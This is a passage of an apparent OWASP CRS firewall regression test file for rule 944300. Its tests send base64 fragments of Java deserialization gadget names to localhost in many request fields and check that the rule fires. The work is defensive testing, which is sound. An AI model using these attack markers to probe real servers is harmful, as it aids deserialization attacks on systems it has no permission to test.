"en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-78 + desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-79 + desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-80 + desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-81 + desc: "Cookie name includes keyword 
GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-82 + desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-83 + desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-84 + desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-85 + desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-86 + desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-87 + desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-88 + desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-89 + desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-90 + desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-91 + desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-92 + desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-93 + desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-94 + desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-95 + desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-96 + desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-97 + desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-98 + desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-99 + desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-100 + desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-101 + desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-102 + desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-103 + desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-104 + desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-105 + desc: "XML attribute value includes keyword 
Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-106 + desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-107 + desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-108 + desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-109 + desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-110 + desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-111 + desc: "Argument test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-112 + desc: "Argument name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-113 + desc: "Cookie test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-114 + desc: "Cookie name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-115 + desc: "Request header test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-116 + desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-117 + desc: "XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-118 + desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-119 + desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-120 + desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-121 + desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-122 + desc: "Argument test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: 
"HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-123 + desc: "Argument name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-124 + desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-125 + desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-126 + desc: "Request header test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-127 + desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-128 + desc: "XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 